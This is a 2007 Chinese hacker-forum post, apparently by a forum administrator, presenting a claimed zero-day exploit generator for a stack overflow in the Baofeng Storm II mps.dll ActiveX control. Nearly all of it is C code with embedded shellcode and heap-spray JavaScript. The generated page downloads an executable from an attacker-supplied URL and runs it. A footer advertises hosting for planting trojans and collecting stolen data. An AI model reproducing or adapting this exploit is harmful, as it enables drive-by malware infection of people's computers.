|
寂寞中的活跃者 管理员-庶民之子
 
最高执行者 - 帖子
- 698
- 威望
- 0 点
- T币
- 39 个
- 警告
- 0 次
- 活力
- 393 点
- 性别
- 男
- 来自
- 北京
- 在线时间
- 568 小时
- 注册时间
- 2007-9-19
- 最后登录
- 2008-11-20
|
1#
大 中
小 发表于 2007-11-7 00:27 只看该作者
暴风影音II mps.dll ActiveX栈溢出漏洞0day
暴风影音II mps.dll ActiveX栈溢出漏洞0day
// written by haohack@msn.com (2007)
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[346] =
{
0x90, 0x90, 0x90, 0x90, 0xe9, 0xef, 0x00, 0x00, 0x00, 0x5a, 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00,
0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08, 0x8b, 0xd8, 0x8b, 0x73, 0x3c, 0x8b,
0x74, 0x1e, 0x78, 0x03, 0xf3, 0x8b, 0x7e, 0x20, 0x03, 0xfb, 0x8b, 0x4e, 0x14, 0x33, 0xed, 0x56,
0x57, 0x51, 0x8b, 0x3f, 0x03, 0xfb, 0x8b, 0xf2, 0x6a, 0x0e, 0x59, 0xf3, 0xa6, 0x74, 0x08, 0x59,
0x5f, 0x83, 0xc7, 0x04, 0x45, 0xe2, 0xe9, 0x59, 0x5f, 0x5e, 0x8b, 0xcd, 0x8b, 0x46, 0x24, 0x03,
0xc3, 0xd1, 0xe1, 0x03, 0xc1, 0x33, 0xc9, 0x66, 0x8b, 0x08, 0x8b, 0x46, 0x1c, 0x03, 0xc3, 0xc1,
0xe1, 0x02, 0x03, 0xc1, 0x8b, 0x00, 0x03, 0xc3, 0x8b, 0xfa, 0x8b, 0xf7, 0x83, 0xc6, 0x0e, 0x8b,
0xd0, 0x6a, 0x04, 0x59, 0xe8, 0x6a, 0x00, 0x00, 0x00, 0x83, 0xc6, 0x0d, 0x52, 0x56, 0xff, 0x57,
0xfc, 0x5a, 0x8b, 0xd8, 0x6a, 0x01, 0x59, 0xe8, 0x57, 0x00, 0x00, 0x00, 0x83, 0xc6, 0x13, 0x56,
0x46, 0x80, 0x3e, 0x80, 0x75, 0xfa, 0x80, 0x36, 0x80, 0x5e, 0x83, 0xec, 0x40, 0x8b, 0xdc, 0xc7,
0x03, 0x63, 0x6d, 0x64, 0x20, 0x43, 0x43, 0x43, 0x43, 0x66, 0xc7, 0x03, 0x2f, 0x63, 0x43, 0x43,
0xc6, 0x03, 0x20, 0x43, 0x6a, 0x20, 0x53, 0xff, 0x57, 0xec, 0xc7, 0x04, 0x03, 0x5c, 0x61, 0x2e,
0x65, 0xc7, 0x44, 0x03, 0x04, 0x78, 0x65, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x50, 0x53, 0x56, 0x50,
0xff, 0x57, 0xfc, 0x8b, 0xdc, 0x6a, 0x00, 0x53, 0xff, 0x57, 0xf0, 0x68, 0x51, 0x24, 0x40, 0x00,
0x58, 0xff, 0xd0, 0x33, 0xc0, 0xac, 0x85, 0xc0, 0x75, 0xf9, 0x51, 0x52, 0x56, 0x53, 0xff, 0xd2,
0x5a, 0x59, 0xab, 0xe2, 0xee, 0x33, 0xc0, 0xc3, 0xe8, 0x0c, 0xff, 0xff, 0xff, 0x47, 0x65, 0x74,
0x50, 0x72, 0x6f, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x47, 0x65, 0x74, 0x53,
0x79, 0x73, 0x74, 0x65, 0x6d, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x41, 0x00,
0x57, 0x69, 0x6e, 0x45, 0x78, 0x65, 0x63, 0x00, 0x45, 0x78, 0x69, 0x74, 0x54, 0x68, 0x72, 0x65,
0x61, 0x64, 0x00, 0x4c, 0x6f, 0x61, 0x64, 0x4c, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0x00,
0x75, 0x72, 0x6c, 0x6d, 0x6f, 0x6e, 0x00, 0x55, 0x52, 0x4c, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f,
0x61, 0x64, 0x54, 0x6f, 0x46, 0x69, 0x6c, 0x65, 0x41, 0x00
};
const char* script1 = \
"<html>\n<object classid=\"clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB\"\nid='target'>\n</object>\n<body>\n<SCRIPT language=\"javascript\">\n"
"var shellcode = unescape(\"";
const char* script2 = \
"\");\n"
"</script>\n<SCRIPT language=\"javascript\">\n"
"var bigblock = unescape(\"%u9090%u9090\");\n"
"var headersize = 20;\n"
"var slackspace = headersize+shellcode.length;\n"
"while (bigblock.length<slackspace) bigblock+=bigblock;\n"
"fillblock = bigblock.substring(0, slackspace);\n"
"block = bigblock.substring(0, bigblock.length-slackspace);\n"
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n"
"memory = new Array();\n"
"for (x=0; x<300; x++) memory[x] = block + shellcode;\n"
"var buffer = '';\n"
"while (buffer.length < 4057) buffer+='\\x0a\\x0a\\x0a\\x0a';\n"
"buffer+='\\x0a';\n"
"buffer+='\\x0a';\n"
"buffer+='\\x0a';\n"
"buffer+='\\x0a\\x0a\\x0a\\x0a';\n"
"buffer+='\\x0a\\x0a\\x0a\\x0a';\n"
"target.rawParse(buffer);\n"
"</script>\n"
"</body>\n"
"</html>\n";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("exp:cpp1.exe url\nwritten by haohack@msn.com (2007)\n");
return -1;
}
FILE *file = fopen("exp.html", "w+");
if ( file == NULL )
{
printf("create 'exp.html' failed!\n");
return -2;
}
fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
fprintf(file, "%s", script2);
fclose(file);
printf("make 'exp.html' successed!\n");
return 0;
}
最新推出黑客免杀空间15元/月,支持ASP收信、挂马、上线等. 点击申请 |
